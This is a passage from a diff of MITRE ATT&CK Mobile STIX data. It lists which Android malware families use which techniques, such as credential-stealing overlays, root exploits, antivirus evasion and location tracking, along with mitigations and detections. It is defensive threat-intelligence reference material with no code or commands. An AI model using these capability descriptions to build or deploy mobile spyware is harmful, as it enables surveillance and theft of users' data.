"attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5a96d87e-f70e-49dc-a272-c98aad672ce0", + "type": "relationship", + "created": "2019-09-15T15:32:17.563Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-07-09T14:07:02.315Z", + "description": "Application developers could be encouraged to avoid placing sensitive data in notification text.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c374c9ce-ff30-4daa-bdec-8015a507746a", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "source_name": "Kaspersky-Skygofree" + } + ], + "modified": "2019-08-09T18:08:07.145Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) has a capability to obtain files from other installed applications.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7db33293-6971-4c0d-88e0-18f505ebd943", + "created": "2022-04-05T20:11:51.188Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Recent OS versions have made it more difficult for applications to register as VPN providers. ", + "modified": "2022-04-05T20:11:51.188Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3be6ad82-722d-4699-8e3a-c1ea60018244", + "created": "2023-03-16T13:32:55.140Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T13:32:55.140Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ca0d9894-0c37-4a34-9b24-1887b7cd1106", + "created": "2023-03-15T16:26:38.465Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:26:38.465Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b309c25a-6baf-4874-829d-63712a38652c", + "created": "2023-02-06T19:02:16.194Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:21:41.461Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can grant itself camera permissions.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0cae6859-d7d1-483b-b473-4f32084938a9", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "modified": "2019-08-09T17:52:31.818Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) has the ability to record device audio.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--27f5dc22-6ab9-406f-9092-6cb610d777a6", + "created": "2022-04-01T14:59:53.782Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation can often detect jailbroken devices.", + "modified": "2022-04-01T14:59:53.782Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--280aa15d-c7ff-4005-9861-9fc5c3bfe95a", + "created": "2020-12-28T18:47:52.357Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:22:26.702Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can run commands as root.(Citation: Palo Alto HenBox) ", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6a821e14-8247-408b-af37-9cecbba616ec", + "type": "relationship", + "created": "2020-05-07T15:33:32.945Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." + } + ], + "modified": "2020-05-07T15:33:32.945Z", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) obtains the device’s application list.(Citation: CheckPoint Agent Smith)", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--02b3c8fe-1539-4c77-b67e-07fa8a22c91e", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-BrainTest", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "Some original variants of [BrainTest](https://attack.mitre.org/software/S0293) had the capability to automatically root some devices, but that behavior was not observed in later samples.(Citation: Lookout-BrainTest)", + "relationship_type": "uses", + "source_ref": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5a18e6c3-4bbf-4418-8815-55ebf283c8a1", + "created": "2020-10-29T17:48:27.272Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Exobot](https://attack.mitre.org/software/S0522) can obtain a list of installed applications and can detect if an antivirus application is running, and close it if it is.(Citation: Threat Fabric Exobot)", + "modified": "2022-04-15T16:53:00.735Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6ca3e3d9-2db9-4bed-98a0-417ff1e6a78e", + "type": "relationship", + "created": "2021-02-08T16:36:20.692Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." + } + ], + "modified": "2021-05-24T13:16:56.443Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included system information enumeration in the malicious apps deployed as part of Operation BULL and Operation ROCK.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--66132260-65d1-4bf5-8200-abdb2014be6f", + "created": "2020-09-15T15:18:12.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:51:12.881Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can detect if it is running in an emulator and adjust its behavior accordingly.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--04eeed4b-e0fc-4fff-8c61-4c175f26a0fe", + "type": "relationship", + "created": "2019-12-10T16:07:41.093Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019." + } + ], + "modified": "2019-12-10T16:07:41.093Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) can download code and binaries from the C2 server to execute on the device as root.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--44da429b-9dee-43c9-9397-445c6f9e647e", + "created": "2022-03-30T19:54:59.651Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android includes system partition integrity mechanisms that could detect unauthorized modifications. ", + "modified": "2022-03-30T19:54:59.651Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--73d78f2c-dd3b-469c-a622-e2e89cb521d3", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Enterprises can provision policies to mobile devices that require a minimum complexity (length, character requirements, etc.) for the device passcode, and cause the device to wipe all data if an incorrect passcode is entered too many times. Both policies would mitigate brute-force, guessing, or shoulder surfing of the device passcode. Enterprises can also provision policies to disable biometric authentication, however, biometric authentication can help make using a longer, more complex passcode more practical because it does not need to be entered as frequently. ", + "modified": "2022-03-28T19:20:30.375Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cacc0b72-9d73-4381-90e9-545ba908722c", + "type": "relationship", + "created": "2019-09-15T15:35:33.215Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "source_name": "Talos Gustuff Apr 2019" + } + ], + "modified": "2019-09-15T15:35:33.215Z", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) injects the global action `GLOBAL_ACTION_BACK` to mimic pressing the back button to close the application if a call to an open antivirus application is detected.(Citation: Talos Gustuff Apr 2019)", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c43341e3-6fb9-46f1-8ea3-8daede1a4c77", + "created": "2022-04-06T15:52:41.579Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T15:52:41.579Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--a5de0540-73e7-4c67-96da-4143afedc7ed", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--64ddcf35-dbf0-4b9f-bf07-1e0bde8bbe65", + "type": "relationship", + "created": "2021-04-19T17:05:42.574Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-04-19T17:05:42.574Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has collected files from the infected device.(Citation: Lookout Uyghur Campaign)\t", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d700c625-d0b6-4570-a538-0ba57bd7bda5", + "created": "2023-03-20T18:50:21.296Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:50:21.296Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e75c623a-f9ac-4f46-b093-dd0e40b50cc6", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Proofpoint-Marcher", + "url": "https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks", + "description": "Proofpoint. (2017, November 3). Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Marcher](https://attack.mitre.org/software/S0317) attempts to overlay itself on top of legitimate banking apps in an effort to capture user credentials. [Marcher](https://attack.mitre.org/software/S0317) also attempts to overlay itself on top of legitimate apps such as the Google Play Store in an effort to capture user credit card information.(Citation: Proofpoint-Marcher)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f9854ba6-989d-43bf-828b-7240b8a65291", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4d431474-1dcc-4d0e-9906-129eb02f00b3", + "created": "2023-02-06T19:43:43.574Z", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:43:43.574Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can uninstall itself.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a3c4b392-2879-4f31-9431-3398e034851b", + "created": "2022-04-06T13:52:37.470Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be cautioned against granting administrative access to applications.", + "modified": "2022-04-06T13:52:37.470Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--818b8c2b-bd23-4a83-9970-d42063608699", + "created": "2020-04-24T15:06:33.393Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:49:04.950Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can collect device contacts.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bce64ec2-43d5-4501-a0aa-0abe65551a19", + "type": "relationship", + "created": "2021-02-17T20:43:52.381Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-02-17T20:43:52.381Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has retrieved account information for other applications.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a8ac5084-5631-4670-8ac6-6fbe7bdb0a84", + "type": "relationship", + "created": "2019-07-10T15:35:43.708Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.797Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) tracks the latitude and longitude coordinates of the infected device.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--718a612e-50c5-40ab-9081-b88cefeafcb6", + "created": "2021-04-26T15:33:55.905Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CitizenLab Circles", + "url": "https://citizenlab.ca/2020/12/running-in-circles-uncovering-the-clients-of-cyberespionage-firm-circles/", + "description": "Bill Marczak, John Scott-Railton, Siddharth Prakash Rao, Siena Anstis, and Ron Deibert. (2020, December 1). Running in Circles Uncovering the Clients of Cyberespionage Firm Circles. Retrieved December 23, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Circles](https://attack.mitre.org/software/S0602) can track the location of mobile devices.(Citation: CitizenLab Circles)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c6a07c89-a24c-4c7e-9e3e-6153cc595e24", + "target_ref": "attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + 